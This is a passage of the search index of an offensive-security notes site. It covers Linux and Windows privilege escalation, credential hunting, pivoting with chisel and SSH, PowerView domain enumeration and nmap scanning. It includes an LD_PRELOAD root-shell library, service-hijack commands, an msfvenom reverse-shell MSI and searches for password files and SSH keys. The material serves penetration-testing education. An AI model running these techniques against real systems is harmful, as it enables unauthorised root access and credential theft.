In the above example, we can see that the python interpreter can arbitrarily set the user ID of the process. This means that we can change our user ID to 0 when running python, thus escalating our privileges:","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing Linux Capabilities » Introduction","id":"171","title":"Introduction"},"172":{"body":"The LD_PRELOAD environment variable can be used to tell the dynamic linker to load specific libraries before any others. By default, programmes run with sudo will be executed in a clean, minimal environment which is specified by env_reset when running sudo -l. However, env_keep may be used to inherit some environment variables from the parent process. If LD_PRELOAD is specified together with env_keep, then we can compile our own malicious dynamic library and set LD_PRELOAD to it. Therefore, when we execute a binary with sudo, our library will be loaded before any other library and its initialisation function will be invoked with root permissions.","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Sudo Escalation via LD_PRELOAD » Introduction","id":"172","title":"Introduction"},"173":{"body":"Writing the library is a fairly simple task. All we need to do is write an _init function in a C file. This procedure will contain the code we want to be executed when the library is loaded. #include \n#include \n#include void _init()\n{ unsetenv(\"LD_PRELOAD\"); // Unset LD_PRELOAD to avoid an infinite loop setgid(0); // Set root permissions setuid(0); // Set root permissions system(\"/bin/bash\");\n} We begin by unsetting the LD_PRELOAD variable from the environment. This is to preclude an infinite loop when /bin/bash is invoked. If our library didn't unset LD_PRELOAD, then when /bin/bash is called, our library will again be loaded first and then proceed onto launching /bin/bash yet again, which will again load our library and so on. 
The next two lines set the user and group IDs to those of root which ensures that the next commands are run with root privileges. Finally, system is called in order to spawn a bash shell. We now need to compile this file as a shared library: gcc -fPIC -shared -o exploit.so exploit.c -nostartfiles At last, we can invoke any binary with sudo and specify the path to our library as LD_PRELOAD. Note that the path to the library must be specified as an absolute path.","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Sudo Escalation via LD_PRELOAD » Writing the Malicious Library","id":"173","title":"Writing the Malicious Library"},"174":{"body":"Once you have gained access to a system, it is paramount to look for other credentials which may be located on the system. These may be hidden in the Windows Registry, within log or configuration files, and more. Moreover, you should check to see if any credentials you have previously found work with anything else. You should also check if you have access to the Windows SYSTEM or SAM files or any of their backups, since those will contain the hashes for users on the system. If so, you might be able to perform a pass-the-hash attack or simply crack them. If the compromised system is a Windows Server, you should look for any stored credentials which can be used with RunAs. You should check the Windows build and version, see if there are any kernel exploits available. You should then move onto enumerating misconfigurations in services and other Windows-specific vectors. If none of these bear any fruit, you should look at the programmes installed on the system, enumerate them for misconfigurations, explore their versions and any exploits which may be available. If none are found, you might consider reverse engineering and binary exploitation as a last resort. Finally, if you have gained access as a local administrator, you should proceed to looking for ways to bypass UAC . 
In essence: Credentials Reused Credentials Credentials in Configuration or Log files Credentials in the Windows Registry Credentials from Windows SAM and SYSTEM files Pass-the-hash attacks Stored Credentials (Windows Servers) Kernel Exploits Misconfigurations Services AutoRuns Startup Applications Scheduled Tasks AlwaysInstallElevated Group Policy Bypassing UAC","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Methodology","id":"174","title":"Methodology"},"175":{"body":"Windows Services allow for the creation of continuously running executable applications. These applications have the ability to be automatically started upon booting, they may be paused and restarted, and they lack a user interface. In order for a service to function properly, it needs to be associated with a system or user account. There are a few common built-in system accounts that are used to operate services such as LocalService, NetworkService, and LocalSystem. The following table describes the default secure access rights for accounts on a Windows system: Account Permissions Local Authenticated Users (including LocalService and Network Service) READ_CONTROL SERVICE_ENUMERATE DEPENDENTS SERVICE_INTERROGATE SERVICE_QUERY_CONFIG SERVICE_QUERY_STATUS SERVICE_USER_DEFINED_CONTROL Remote Authenticated Users Same as those for Local Authenticated Users. 
LocalSystem READ_CONTROL SERVICE_ENUMERATE DEPENDENTS SERVICE_INTERROGATE SERVICE_PAUSE_CONTINUE SERVICE_QUERY_CONFIG SERVICE_QUERY_STATUS SERVICE_START SERVICE_STOP SERVICE_USER_DEFINED_CONTROL Administrators DELETE READ_CONTROL SERVICE_ALL_ACCESS WRITE_DAC WRITE_OWNER Moreover, a registry entry exists for each service in HKLM\\SYSTEM\\CurrentControlSet\\Services.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Introduction","id":"175","title":"Introduction"},"176":{"body":"In general, manual enumeration of Windows services is a rather cumbersome process, so I suggest that you use a tool for automation such as WinPEAS . winpeas.exe servicesinfo The permissions a user has on a specific service can be inspected via the AccessChk Windows Utility. accesschk.exe /accepteula -uwcqv ","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Enumeration","id":"176","title":"Enumeration"},"177":{"body":"This is a vulnerability which can be used to force a misconfigured service to execute an arbitrary programme in lieu of its intended one, as long as the path to that executable contains spaces. On its own, this does not allow for privilege escalation, but it becomes a really powerful tool when the misconfigured service is set to run with system privileges. Let's take a look at the following path: C:\\Program Files\\Vulnerable Service\\service.exe If this path was specified to the service in quotation marks, \"C:\\Program Files\\Vulnerable Service\\service.exe\", then Windows will treat it correctly, executing the service.exe file in the C:\\Program Files\\Vulnerable Service directory. However, Windows is not the sharpest tool in the box and if the path is provided without quotation marks, then it will see ambiguity in what it is supposed to execute. 
The path will be split at each space character - the first segment will be treated as the executable's name and the rest will be seen as command-line arguments to be passed to it. So at first, Windows will try to execute the following: C:\\Program.exe Files\\Vulnerable Service\\service.exe Once Windows determines that the C:\\Program.exe file does not exist, it will look for the next space character, treat the characters up to it as the new path and try to execute it again: C:\\Program Files\\Vulnerable.exe Service\\service.exe Now, this process repeats until a file is successfully executed or the end of the path has been reached. If we are able to create a malicious executable in any of the possible paths that Windows will traverse, then we can hijack the service before the intended file is found. Once you have identified a vulnerable service, you can query to confirm that the path is indeed unquoted. Let's check our access to the possible directories that will be probed by Windows: accesschk.exe /accepteula -uwdq While we cannot write within the C:\\ or C:\\Program Files directories (meaning that we cannot create C:\\Program.exe or C:\\Program Files\\Unquoted.exe), we do have write access to C:\\Program Files\\Unquoted Path Service\\. What this entails is our ability to create a Common.exe binary inside this directory and, since the initial path was unquoted, the path C:\\Program Files\\Unquoted Path Service\\Common.exe will be probed before C:\\Program Files\\Unquoted Path Service\\Common Files\\unquotedpathservice.exe and once Windows finds our malicious executable there, it will be executed with the service's permissions. 
If we couldn't restart the service, then we could have simply waited for something else to execute it.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Unquoted Service Paths » Unquoted Service Paths","id":"177","title":"Unquoted Service Paths"},"178":{"body":"As previously mentioned, each service is associated with a registry entry in the Windows Registry which is located at HKLM\\SYSTEM\\CurrentControlSet\\Services\\. This entry is essentially the configuration of the service and if it is writable, then it can be abused by an adversary to overwrite the path to the binary application of the service with a malicious one. Querying regsvc reveals that it is running with system privileges and its registry entry is writable by all logged-on users (NT AUTHORITY\\INTERACTIVE). All we need to do now is overwrite the ImagePath registry key in the service's entry to point to our malicious executable: reg add HKLM\\SYSTEM\\CurrentControlSet\\services\\ /v ImagePath /t REG_EXPAND_SZ /d /f Restart the service and catch the shell: net start regsvc","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Weak Registry Permissions » Weak Registry Permissions","id":"178","title":"Weak Registry Permissions"},"179":{"body":"This is a technique which leverages misconfigurations in the service permissions for a specific user. If permissions for a specific user differ from the ones described in the table here , then they may manifest as a possible vulnerability. To identify such services, it is useful to use WinPEAS. It appears that user has write access to the service daclsvc and can also start the service. We can query the service to see what user account is actually executing it: sc qc It appears that the service is running as LocalSystem which is an account with more privileges than our user account. 
If we can write to the service, then we can alter its configuration and change the path to the executable which is supposed to be run: sc config binpath=\"\\\"\\\"\" All we now need to do is set up a listener and run the service: net start And we get a system shell back:","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Insecure Service Permissions » Insecure Service Permissions","id":"179","title":"Insecure Service Permissions"},"18":{"body":"There are two types of ports depending on the transport-layer protocol that they support. Both TCP and UDP ports range from 0 to 65535 but they are completely separate. For example, DNS uses UDP port 53 for queries but it uses TCP port 53 for zone transfers. To scan UDP ports, nmap requires elevated privileges and the -sU flag. nmap -sU Note Due to the nature of the protocol, UDP scanning takes a lot longer than TCP does.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » TCP vs UDP","id":"18","title":"TCP vs UDP"},"180":{"body":"The binary application executed by a service is considered insecure when an adversary has write access to it when they shouldn't. This means that an attacker can simply replace the file with a malicious executable. If the service is configured to run with system privileges, then those privileges will be inherited by the attacker's executable! All we need to do is simply replace the legitimate executable with a malicious one and then start the service.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Misconfigured Services » Insecure Service Executable Permissions » Introduction","id":"180","title":"Introduction"},"181":{"body":"AutoRun applications are programmes which have been set up to automatically execute when a user logs in for the first time after booting the system. This is typically done so that the application can look for updates and update itself if necessary. 
For example, Steam, Spotify, and Discord, all set this up upon installation. On its own, this does not pose a security risk. The real vulnerability lies in AutoRuns which are writable by anyone. AutoRuns can be enumerated by querying the registry: reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run Now all we need to do is generate the malicious executable and replace the AutoRun programme with it. Note that in order for the exploit to work, an administrator would need to log in. Now, as soon as the administrator logs in, we will get an elevated shell.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » AutoRun Programmes » Introduction","id":"181","title":"Introduction"},"182":{"body":"Windows has a group policy which, when enabled, allows a user to install a Microsoft Windows Installer Package (.msi file) with elevated privileges. This poses a security risk because an adversary can simply generate a malicious .msi file and execute it with admin privileges. In order to check for this vulnerability, one need only query the following registry keys: reg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated\nreg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated The AlwaysInstallElevated policy appears enabled, so we can generate a malicious .msi executable. One way to do this is through Metasploit: msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f msi -o reverse.msi Next, transfer the executable to the target machine and execute it with msiexec: msiexec /quiet /qn /i ","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » AlwaysInstallElevated Group Policy » Introduction","id":"182","title":"Introduction"},"183":{"body":"Kernel exploits are one of the most trivial privilege escalation paths available. 
One of the first things you should do when seeking for a privilege escalation vector is to look at the kernel version as well as any installed patches and determine if it is vulnerable to a known kernel exploit. Plenty of exploits can be found just by searching up the kernel version, but a cheat sheet which I like can be found here . Naturally, the exploitation of a kernel exploit is highly specific on a case-by-case basis. Once you have identified that the system is vulnerable to a known kernel exploit, you will need to find the exploit code.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Kernel Exploits » Introduction","id":"183","title":"Introduction"},"184":{"body":"Windows Scheduled Tasks allow for the periodic execution of scripts. These can be manually enumerated via the following command: schtasks /query /fo LIST /v A scheduled task is of interest when it is executed with elevated privileges but we have write access to the script it executes. This script is fairly simple, so we can just append a line to it which executes a malicious executable. When the time for the scheduled task comes, we will catch an elevated shell.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Scheduled Tasks » Introduction","id":"184","title":"Introduction"},"185":{"body":"User Account Control (UAC) is a security measure introduced in Windows Vista which aims to prevent unauthorised changes to the operating system. It ensures that any such changes require the assent of the administrator or a user who is part of the local administrators group. Administrative privileges in Windows are a bit different from those in Linux. Even if an adversary manages to execute some code from an administrator account, this code will not run with elevated privileges, unless it was \"run as Administrator\"-ed. When an unprivileged user attempts to run a programme as administrator, they will be prompted by UAC to enter the administrator's password. 
However, if the user is privileged (they are an administrator), they will still be prompted with the same UAC prompt, but it will ask them for consent in lieu of a password. Essentially, an administrative user will need to click \"Yes\" instead of typing their password. What is described so far is the default behaviour. UAC, however, has different protection levels which can be configured. Now there are 3 (two of the options are the same but with different aesthetics) options. The first option, and the most strict, is Always Notify. If UAC is set to this, then any programme which tries to run with elevated privileges will beget a UAC prompt - including Windows built-in ones. Next is the default setting - Notify me when application try to make changes to my computer. Under this configuration, regular applications will still cause a UAC prompt to show up whenever run as administrator, however, Windows built-in programmes can be run with elevated privileges without such a prompt. Following is another option which is the exact same as this one, but the UAC prompt will not dim the screen. This is useful for computers for which dimming the screen is not exactly a trifling task. Finally, the Never Notify means that a UAC prompt will never be spawned no matter who is trying to run the application with elevated privileges. UAC can be bypassed if an adversary already has access to a user account which is part of the local administrators group and UAC is configured to the default setting.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Bypassing UAC » Introduction","id":"185","title":"Introduction"},"186":{"body":"There are many tools for bypassing UAC and which one is to be used depends on the Windows build and version. One such tool which has lots of methods for bypassing UAC is UACMe . 
You will need to build it from source using Visual Studio, meaning that you will need a Windows machine in order to compile it.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Bypassing UAC » Bypassing UAC","id":"186","title":"Bypassing UAC"},"187":{"body":"Windows Startup applications are very similar to AutoRun Programmes , however, they are executed every time a user logs in. If we can write to the Startups directory, then we can place a malicious executable there which will be executed upon the next login. If the next user to log in is an administrator, then we will gain elevated privileges. To check for write access to the Startups directory, we can use accesschk: C:\\PrivEsc\\accesschk.exe /accepteula -d \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\" All we need to do is place a malicious executable in the directory and wait for an admin to log in.","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Startup Applications » Introduction","id":"187","title":"Introduction"},"188":{"body":"Windows Servers have capabilities to store credentials using a built-in utility called cmdkey . On its own, cmdkey is rather useless to an adversary - you can only really use it to list what credentials are stored but not actually reveal them. cmdkey /list The real deal is another built-in utility called Runas . It allows one user to execute a binary with the permissions of another and, what is essential here, this can be achieved with only stored credentials. One doesn't even need to know what the credentials are - so long as a user has their credentials stored, then they can be used to execute programmes as that user. runas /savedcred /user: ","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Stored Credentials » Introduction","id":"188","title":"Introduction"},"189":{"body":"Windows Access Tokens are objects which describe the security context in which a thread or process is run. 
The information within an access token identifies the user and their privileges of said process or thread. Upon each successful user log-on, an access token for the user is generated and every process executed by this user will contain a copy of this token called the primary token . This token is used by the system to inspect the privileges of the process when the process tries to interact with something which may require certain privileges. However, threads of the process are allowed to use a second token, called an impersonation token , to interact with objects as if they had a different security context and different privileges. This is only allowed when the process has the SeImpersonatePrivilege. As with UAC bypassing , exploiting token impersonation is highly dependent on the Windows build and version. However, the most infamous exploits are the Potato exploits .","breadcrumbs":"Post Exploitation » Privilege Escalation » Windows » Token Impersonation » Introduction","id":"189","title":"Introduction"},"19":{"body":"When scanning, nmap will determine that a port is in one of the following states: open - an application is actively listening for TCP connections, UDP datagrams or SCTP associations on this port closed - the port is accessible (it receives and responds to Nmap probe packets), but there is no application listening on it filtered - Nmap cannot determine whether the port is open because packet filtering prevents its probes from reaching the port. Usually, the filter sends no response, so Nmap needs to resend the probe a few times in order to be sure that it wasn't dropped due to traffic congestion. This slows the scan drastically unfiltered - the port is accessible, but Nmap is unable to determine whether it is open or closed. Only the ACK scan, used for mapping firewall rulesets, may put ports in this state open|filtered - Nmap is unable to determine whether the port is open or filtered. 
This occurs for scan types in which open ports give no response closed|filtered - Nmap is unable to determine whether the port is closed or filtered. It is only used for the IP ID idle scan. By default, nmap scans only the 1000 most common TCP ports. One can scan specific ports by listing them separated by commas directly after the -p flag. nmap -pport1,port2,... If no ports are specified after the -p flag, nmap will scan all ports (either UDP or TCP depending on the type of scan). nmap -p ","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » Port States","id":"19","title":"Port States"},"190":{"body":"","breadcrumbs":"Post Exploitation » Enumeration","id":"190","title":"Post Exploitation"},"191":{"body":"There are plenty of tools which can be used for automating post-exploitation enumeration on Linux machines.","breadcrumbs":"Post Exploitation » Enumeration » Linux » Introduction","id":"191","title":"Introduction"},"192":{"body":"LinPEAS is an amazing tool for automation enumeration. It is written in Bash which means that it requires no additional dependencies and can be freely run. In order to acquire the latest version of LinPEAS, run the following command: wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh By default, running LinPEAS will perform many checks on the system and spit out a deluge of information. However, the tool can also be used to only perform specific tasks using the -o argument. 
Enumerate system information: ./linpeas.sh -o system_information Enumerate containers on the machine: ./linpeas.sh -o container Enumerate cloud platforms: ./linpeas.sh -o cloud Enumerate available software: ./linpeas.sh -o software_information Enumerate processes, cronjobs, services, and sockets: ./linpeas.sh -o procs_crons_timers_srvcs_sockets Enumerate network information: ./linpeas.sh -o network_information Enumerate user information: ./linpeas.sh -o users_information Enumerate interesting files: ./linpeas.sh -o interesting_files","breadcrumbs":"Post Exploitation » Enumeration » Linux » Linux Enumeration with LinPEAS","id":"192","title":"Linux Enumeration with LinPEAS"},"193":{"body":"Find all files in a directory which contain \"pass\" or \"password\", ignoring case: grep --color=auto -rnw '' -ie \"password\\|pass\" --color=always 2>/dev/null Find all files in a directory which contain \"pass\" or \"password\" in their name, ignoring case: find / -name \"*pass*\" 2>/dev/null","breadcrumbs":"Post Exploitation » Enumeration » Linux » Hunting Down Sensitive Files » Finding Files Containing Passwords","id":"193","title":"Finding Files Containing Passwords"},"194":{"body":"find / -name id_rsa 2>/dev/null","breadcrumbs":"Post Exploitation » Enumeration » Linux » Hunting Down Sensitive Files » Finding SSH Keys","id":"194","title":"Finding SSH Keys"},"195":{"body":"System enumeration is a crucial, typically first, step in the enumeration phase of post-exploitation.","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » Introduction","id":"195","title":"Introduction"},"196":{"body":"cat /etc/issue","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » Enumerating the Distribution Version","id":"196","title":"Enumerating the Distribution Version"},"197":{"body":"uname -a cat /proc/version","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » Enumerating Linux Kernel Version 
Information","id":"197","title":"Enumerating Linux Kernel Version Information"},"198":{"body":"lscpu","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » Enumerating CPU Architecture","id":"198","title":"Enumerating CPU Architecture"},"199":{"body":"ps aux","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » Enumerating Running Services","id":"199","title":"Enumerating Running Services"},"2":{"body":"You should only make changes inside the eight category folders under the Notes/ directory. Minor edits to already existing content outside of the aforementioned allowed directories are permitted as long as they do not bring any semantic change - for example fixing typos.","breadcrumbs":"Cyberclopaedia » Contributing » In-Scope","id":"2","title":"In-Scope"},"20":{"body":"This is the type of scan which nmap defaults to when run with elevated privileges and is also also referred to as a \"stealth scan\". Nmap sends a SYN packet to the target, initiating a TCP connection. The target responds with SYN ACK, telling Nmap that the port is accessible. Finally, Nmap terminates the connection before it's finished by issuing an RST packet. This type of scan can also be specified using the -sS option. 
Note Despite its moniker, a SYN scan is no longer considered \"stealthy\" and is quite easily detected nowadays.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » SYN Scan » SYN Scan","id":"20","title":"SYN Scan"},"200":{"body":"List files owned by a certain user in a directory: find -user 2>/dev/null List files owned by a certain user in a directory (without /proc): find -user 2>/dev/null | grep -v \"/proc\" List files owned by a certain group in a directory: find -group 2>/dev/null find -group 2>/dev/null | grep -v \"/proc\" # ignore /proc","breadcrumbs":"Post Exploitation » Enumeration » Linux » System Enumeration » File System Enumeration","id":"200","title":"File System Enumeration"},"201":{"body":"whoami id","breadcrumbs":"Post Exploitation » Enumeration » Linux » User Enumeration » Enumerate User Name and Group","id":"201","title":"Enumerate User Name and Group"},"202":{"body":"sudo -l","breadcrumbs":"Post Exploitation » Enumeration » Linux » User Enumeration » Enumerate Commands Runnable as Root","id":"202","title":"Enumerate Commands Runnable as Root"},"203":{"body":"cat /etc/passwd","breadcrumbs":"Post Exploitation » Enumeration » Linux » User Enumeration » List Users on the Machine","id":"203","title":"List Users on the Machine"},"204":{"body":"history","breadcrumbs":"Post Exploitation » Enumeration » Linux » User Enumeration » Get History of Commands the User Has Run","id":"204","title":"Get History of Commands the User Has Run"},"205":{"body":"Get a list of the network interfaces connected to the machine with their IPs and MACs: ip a Get a list of the machines that the victim has been interacting with (print the ARP table): ip neigh","breadcrumbs":"Post Exploitation » Enumeration » Linux » Network Enumeration » List Network Interfaces and Network Information","id":"205","title":"List Network Interfaces and Network Information"},"206":{"body":"netstat -ano","breadcrumbs":"Post Exploitation » Enumeration » Linux » Network Enumeration » List 
Open Ports","id":"206","title":"List Open Ports"},"207":{"body":"Plenty of automated tools can be found for enumerating Windows machines. They are a bit more diverse than those available for Linux - there are precompiled binaries (.exes) available, but there are also PowerShell scripts and many more.","breadcrumbs":"Post Exploitation » Enumeration » Windows » Introduction","id":"207","title":"Introduction"},"208":{"body":"WinPEAS is an incredible tool for enumerating Windows machines. It comes in two flavours - .bat and .exe. It doesn't really matter which one you are going to run - both will do the job just fine - however, the .exe file requires .Net version 4.5.2 or later to be installed on the machine. Enumerating system information: winpeas.exe systeminfo","breadcrumbs":"Post Exploitation » Enumeration » Windows » Windows Enumeration with WinPEAS","id":"208","title":"Windows Enumeration with WinPEAS"},"209":{"body":"systeminfo","breadcrumbs":"Post Exploitation » Enumeration » Windows » System Enumeration » Enumerate System Information","id":"209","title":"Enumerate System Information"},"21":{"body":"This is the default scan for nmap when it does not have elevated privileges. It initiates a full TCP connection and as a result can be slower. Additionally, it is also logged at the application level. 
This type of scan can also be specified via the -sT option.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » TCP Connect Scan » TCP Connect Scan","id":"21","title":"TCP Connect Scan"},"210":{"body":"wmic qfe","breadcrumbs":"Post Exploitation » Enumeration » Windows » System Enumeration » Enumerate Patches","id":"210","title":"Enumerate Patches"},"211":{"body":"wmic logicaldisk get caption,description,providername","breadcrumbs":"Post Exploitation » Enumeration » Windows » System Enumeration » Enumerate Drives","id":"211","title":"Enumerate Drives"},"212":{"body":"Pivoting is the act of establishing access to internal resources on a network through a compromised machine. This allows an adversary to exifltrate local data which is usually not accessible from the outside world. Moreover, it permits the use of hacking tools as if they were running from inside the network.","breadcrumbs":"Post Exploitation » Pivoting » Introduction","id":"212","title":"Introduction"},"213":{"body":"Chisel is an open-source application for port tunneling. You can get it from https://github.com/jpillora/chisel. Clone the repo and follow the installation instructions. In order to port tunnel with chisel, you need to have a copy of the binary on both the attacking and the compromised machines.","breadcrumbs":"Post Exploitation » Pivoting » Tunneling with Chisel » Introduction","id":"213","title":"Introduction"},"214":{"body":"Run the following command on the attacking machine: chisel server -p [Listen Port] --reverse & This will setup a chisel server on Listen Port. On the compromised systenm run: chisel client [Attacker IP]:[Listen Port] R:[Local Host]:[Local Port]:[Remote Host]:[Remote Port] & This will endeavour to connect to a chisel server at the specified Attacker IP and Listen Port. Once it has connected to the remote chisel server, the chisel server will open Remote Port on the Remote Host and tunnel it to the Local Port of Local Host. 
From now on, any traffic sent to Remote Port on the Remote Host will be forwarded to the Local Port of Local Host. Chisel also defines some defaults for these values, which means you can omit some of them: Local Host - 0.0.0.0 Remote Host - 0.0.0.0 (server localhost) As an example, suppose you start a chisel server on your attacking machine (10.10.10.189) on port 1337, and want to gain access to port 3306 on the compromised machine. On the attacking machine you run: chisel server -p 1337 --reverse & On the compromised system you will run: chisel client 10.10.10.189:1337 R:localhost:3306:localhost:31337 & The above basically translates to \"Forward any traffic intended for port 31337 localhost on my attacking machine to port 3306 on the localhost of the compromised system\".","breadcrumbs":"Post Exploitation » Pivoting » Tunneling with Chisel » Creating a reverse tunnel","id":"214","title":"Creating a reverse tunnel"},"215":{"body":"SSH Tunneling is a port forwarding technique which uses SSH. It can be used to access internal resources within a network if you have SSH access to a host inside it. Additionally, the tunnel goes through a pre-existing SSH connection and can thus be utilised for bypassing firewalls.","breadcrumbs":"Post Exploitation » Pivoting » SSH Tunneling » Introduction","id":"215","title":"Introduction"},"216":{"body":"Local port forwarding is used when you want to create a bridge to a port that hosts an internal service which does not accept connections from outside the network. For this to work, you need to specify two ports - one for the service on the remote machine which you want to access and one on your local machine to create the listener on. Any packets sent to your machine on the local port will be tunneled to the port on the remote machine through the SSH connection. Whilst you will still receive any responses to requests you send through the tunnel, you won't be able to receive arbitrary data that gets sent to the remote port. 
The syntax is fairly simple: ssh -L [LOCAL_IP:]LOCAL_PORT:DESTINATION:DESTINATION_PORT SSH_SERVER [LOCAL_IP:] - the interface you want to open the listener on. This can be omitted and defaults to localhost. LOCAL_PORT - the port you want to start the listener on. Any traffic sent to this port will be forwarded through the tunnel. DESTINATION - the destination host. This does not need to (and most likely won't) match SSH_SERVER, since you are now trying to access an internal resource. DESTINATION_PORT - the port on the remote machine, that you want to access through the tunnel. You can also add -N -f to the above command, so that ssh runs in the background and only opens the tunnel without giving an interface for typing commands. We have now established a tunnel on my Kali machine's port 8080, which will forward any traffic to 192.168.129.137:1337, which is my ubuntu server. So let's see if we can access the web page. Wait, what? We just created the tunnel, but it does not seem to work? Well, remember how the DESTINATION does not need to match the server's IP? This is because the DESTINATION is where the traffic is sent after it gets to the remote machine. In a sense, the remote machine is now the sender and not us. Therefore, in order to access a resource internal to the network, we would need to change DESTINATION to something like localhost or another computer's IP. Let's again check to see if we have access to the resource hidden behind localhost:1337 on the Ubuntu server...","breadcrumbs":"Post Exploitation » Pivoting » SSH Tunneling » Local Port Forwarding","id":"216","title":"Local Port Forwarding"},"217":{"body":"Remote port forwarding is sort of the reverse of local port forwarding. A tunnel is opened and any traffic sent to the tunnel port on the remote machine will be forwarded to the local machine. In the exact same way as above, once the traffic is tunneled, the local machine becomes the sender. 
Therefore, remote port forwarding is more useful when you want to receive traffic from inside the network, rather than injecting it. You will be able to actively receive any data that is sent to the remote port, but you won't be able to send arbitrary data through the tunnel yourself. The syntax is also very similar: ssh -R [REMOTE:]REMOTE_PORT:DESTINATION:DESTINATION_PORT SSH_SERVER [REMOTE:] - the remote host to listen on. This resembles the LOCAL_IP when local port forwarding and can be omitted. If left empty, the remote machine will bind on all interfaces REMOTE_PORT - the port on the remote machine that is part of the tunnel. DESTINATION:DESTINATION_PORT - the host and port that the traffic should be sent to once it gets from the remote machine back to the local machine Once again, you can add -N -f to the command, so that ssh runs in the background and only opens the tunnel without giving an interface for typing commands.","breadcrumbs":"Post Exploitation » Pivoting » SSH Tunneling » Remote Port Forwarding","id":"217","title":"Remote Port Forwarding"},"218":{"body":"","breadcrumbs":"Post Exploitation » Active Directory (AD) » Active Directory (AD)","id":"218","title":"Active Directory (AD)"},"219":{"body":"PowerView is a PowerShell tool for the enumeration of Windows domains. The script can be downloaded from https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1. Before running, you need to bypass PowerShell's execution policy: powershell -ep bypass Load the script using . .\\PowerView.ps1 Normally, you'd be running these commands through some sort of shell, but for the sake of simplicity, I will show them all run locally.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Overview","id":"219","title":"Overview"},"22":{"body":"These scan types make use of a small loophole in the TCP RFC to differentiate between open and closed ports. 
RFC 793 dictates that \"if the destination port state is CLOSED .... an incoming segment not containing a RST causes a RST to be sent in response.” It also says the following about packets sent to open ports without the SYN, RST, or ACK bits set: “you are unlikely to get here, but if you do, drop the segment, and return\". Scanning systems compliant with this RFC text, any packet not containing SYN, RST, or ACK bits will beget an RST if the port is closed and no response at all if the port is open. So long as none of these flags are set, any combination of the other three (FIN, PSH, and URG) is fine. These scan types can sneak through certain non-stateful firewalls and packet filtering routers and are a little more stealthy than even a SYN scan. However, not all systems are compliant with RFC 793 - some send a RST even if the port is open. Some operating systems that do this include Microsoft Windows, a lot of Cisco devices, IBM OS/400, and BSDI. These scans will work against most Unix-based systems. 
It is not possible to distinguish an open from a filtered port with these scans, hence why the port states will be open|filtered.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » FIN, NULL & XMAS Scans » Overview","id":"22","title":"Overview"},"220":{"body":"Get-NetDomain","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Domain Information","id":"220","title":"Get Domain Information"},"221":{"body":"Get-NetDomainController","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Domain Controller Information","id":"221","title":"Get Domain Controller Information"},"222":{"body":"Get-DomainPolicy You can also get information about a specific policy with the following syntax: (Get-DomainPolicy).\"policy name\"","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Retrieve Domain Policy Information","id":"222","title":"Retrieve Domain Policy Information"},"223":{"body":"Get-NetUser The output of this command is rather messy, but you can pull specific information with the following syntax: Get-NetUser | select However, there is an even better way to do that.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Users Information","id":"223","title":"Get Users Information"},"224":{"body":"Get a specific properties of all the users: Get-DomainUser -Properties ,,... 
It is useful to always have the samaccountname as the first property selected, so that you can easily match properties with specific users.","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get User Property Information","id":"224","title":"Get User Property Information"},"225":{"body":"Get-DomainComputer | select samaccountname, operatingsystem","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Domain Machines","id":"225","title":"Get Domain Machines"},"226":{"body":"Get-NetGroup | select samaccountname, admincount, description","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Groups","id":"226","title":"Get Groups"},"227":{"body":"Get-NetGPO | select ,,...","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Get Group Policy Information","id":"227","title":"Get Group Policy Information"},"228":{"body":"https://book.hacktricks.xyz/windows/basic-powershell-for-pentesters/powerview","breadcrumbs":"Post Exploitation » Active Directory (AD) » Domain Enumeration with PowerView » Additional Resources","id":"228","title":"Additional Resources"},"229":{"body":"Bloodhound is a tool used for finding relationships and patterns within data from an Active Directory environment. It is run on the attacker's machine and accessed through a web interface. Bloodhound operates on data and this data comes from a collector which is executed on the target machine.","breadcrumbs":"Post Exploitation » Active Directory 